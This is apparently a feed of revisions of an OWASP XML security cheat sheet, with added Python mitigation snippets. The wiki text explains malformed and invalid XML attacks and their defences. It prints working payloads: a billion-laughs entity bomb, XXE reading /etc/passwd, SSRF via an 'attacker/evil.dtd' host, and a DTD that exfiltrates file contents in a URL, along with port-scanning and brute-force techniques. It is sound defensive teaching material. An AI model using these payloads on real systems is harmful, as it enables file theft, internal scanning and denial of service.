  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;soap:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;soap:Body&amp;gt; &lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
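&lt;br /&gt;
A processor that enforces the SOAP rule on DTDs can refuse any message carrying a DOCTYPE before entities are ever expanded. The following is a minimal Python sketch using the standard-library expat bindings; &amp;lt;tt&amp;gt;DoctypeForbidden&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;assert_no_doctype&amp;lt;/tt&amp;gt; are hypothetical names:&lt;br /&gt;

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def assert_no_doctype(xml_text):
    """Parse the document and raise DoctypeForbidden if a DOCTYPE is present."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called at the start of the DOCTYPE, before any entity is declared.
        raise DoctypeForbidden("DOCTYPE declarations are not accepted")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)
```

Because the handler fires when the DOCTYPE begins, the entity definitions that follow are never processed.&lt;br /&gt;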
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the reference is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, and to perform port scanning or brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each port, then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish in higher latency networks.&lt;br /&gt;
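&lt;br /&gt;
The averaging step described above can be sketched in Python. This is a minimal illustration, not a scanner: the function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt;, the threshold, and the sample timings are all assumptions invented for the example, and the sketch assumes that a quick average indicates an open port, which depends on the implementation being tested.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, open_threshold):
    """Label each port by comparing its average response time to a threshold.

    samples maps a port number to a list of measured times in seconds.
    Assumption: a quick average response is read as an open port.
    """
    status = {}
    for port, times in samples.items():
        average = mean(times)
        status[port] = "open" if open_threshold > average else "closed"
    return status


# Hypothetical measurements in seconds, invented for illustration only.
measurements = {
    80: [0.21, 0.19, 0.25, 0.20],
    8080: [0.48, 0.52, 0.47, 0.55],
}
result = classify_ports(measurements, open_threshold=0.35)
print(result)
```

Taking several samples per port smooths out network jitter; on a high latency network the two averages may overlap and no threshold will separate them reliably.&lt;br /&gt;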
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the userinfo component of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
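&lt;br /&gt;
To see which part of such a URI carries the credentials, the example URI can be split with Python's standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module. This is only a sketch for inspecting the URI structure; the &amp;lt;tt&amp;gt;foo&amp;lt;/tt&amp;gt; scheme is the placeholder used in the example above.&lt;br /&gt;

```python
from urllib.parse import urlsplit

# Split the example URI into its components.
parts = urlsplit("foo://username:password@example.com:8080/")

print(parts.scheme)    # foo
print(parts.username)  # username
print(parts.password)  # password
print(parts.hostname)  # example.com
print(parts.port)      # 8080
```

Each guess in a brute force attempt changes only the username and password portion, while the host and port stay fixed.&lt;br /&gt;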
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224439</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224439"/>
				<updated>2016-12-21T20:26:33Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
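&lt;br /&gt;
The comparison described above can be sketched with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; parser. The document structure, the helper names, and the repetition count are assumptions made for this example; the malformed variant is produced by cutting the final end tag off a well-formed document. Results will differ for other parsers, which is the point of running the measurement against your own stack.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(items=1000):
    """Build a well-formed document programmatically (hypothetical structure)."""
    root = ET.Element("root")
    for i in range(items):
        ET.SubElement(root, "item").text = str(i)
    return ET.tostring(root)


def drop_root_end_tag(document):
    """Make a malformed variant by cutting off the final end tag of root."""
    return document[: document.rfind(b"/root") - 1]


def parse_time(document, repeat=20):
    """Return (best elapsed seconds, whether the parser accepted the input)."""
    best = float("inf")
    accepted = True
    for _ in range(repeat):
        start = time.perf_counter()
        try:
            ET.fromstring(document)
        except ET.ParseError:
            accepted = False
        best = min(best, time.perf_counter() - start)
    return best, accepted


well_formed = build_document()
malformed = drop_root_end_tag(well_formed)
good_time, good_ok = parse_time(well_formed)
bad_time, bad_ok = parse_time(malformed)
print(f"well-formed: {good_time:.6f}s accepted={good_ok}")
print(f"malformed:   {bad_time:.6f}s accepted={bad_ok}")
```

If the malformed time is consistently and significantly larger than the well-formed time, the parser may be a candidate for the asymmetric resource consumption attack described in this section.&lt;br /&gt;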
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters, even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
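&lt;br /&gt;
One possible mitigation is to cap the nesting depth while the document is being read. The following Python sketch uses the standard &amp;lt;tt&amp;gt;iterparse&amp;lt;/tt&amp;gt; function; the helper names and the limits are assumptions chosen for illustration, and the nested test document is generated with its ending tags so that it can be built with the ElementTree API.&lt;br /&gt;

```python
import io
import xml.etree.ElementTree as ET


def build_nested(depth):
    """Build a document nested depth levels deep: A1 contains A2, and so on."""
    root = ET.Element("A1")
    node = root
    for level in range(2, depth + 1):
        node = ET.SubElement(node, f"A{level}")
    return ET.tostring(root)


def within_depth(document, limit):
    """Return False as soon as the nesting depth goes past the limit."""
    depth = 0
    events = ET.iterparse(io.BytesIO(document), events=("start", "end"))
    for event, _ in events:
        if event == "start":
            depth += 1
            if depth > limit:
                return False
        else:
            depth -= 1
    return True


document = build_nested(50)
print(within_depth(document, limit=100))  # True
print(within_depth(document, limit=10))   # False
```

Note that &amp;lt;tt&amp;gt;iterparse&amp;lt;/tt&amp;gt; feeds the input to the parser in chunks, so the check runs incrementally rather than after the whole tree has been built.&lt;br /&gt;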
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
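&lt;br /&gt;
The effect of reading only the first value can be sketched in Python. The injected document from the example above is rebuilt here with the ElementTree API; the function names &amp;lt;tt&amp;gt;naive_price&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;checked_price&amp;lt;/tt&amp;gt; are hypothetical and stand in for whatever logic the application uses.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Rebuild the injected document from the example above.
buy = ET.Element("buy")
ET.SubElement(buy, "id").text = "123"
ET.SubElement(buy, "price").text = "0"   # bogus element injected by the attacker
ET.SubElement(buy, "id")                 # empty element that keeps the document well formed
ET.SubElement(buy, "price").text = "10"  # price appended by the application


def naive_price(order):
    """Return the first price found, with no control on the structure."""
    return order.findtext("price")


def checked_price(order):
    """Return the price only if the children are exactly one id and one price."""
    tags = [child.tag for child in order]
    if tags != ["id", "price"]:
        raise ValueError(f"unexpected structure: {tags}")
    return order.findtext("price")


print(naive_price(buy))  # 0

try:
    checked_price(buy)
except ValueError as error:
    print(error)
```

The structural check here is hand written only to keep the example self-contained; validating against a schema achieves the same control declaratively.&lt;br /&gt;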
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the restrictions that other schema languages can apply to XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the whole value valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially enforced for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
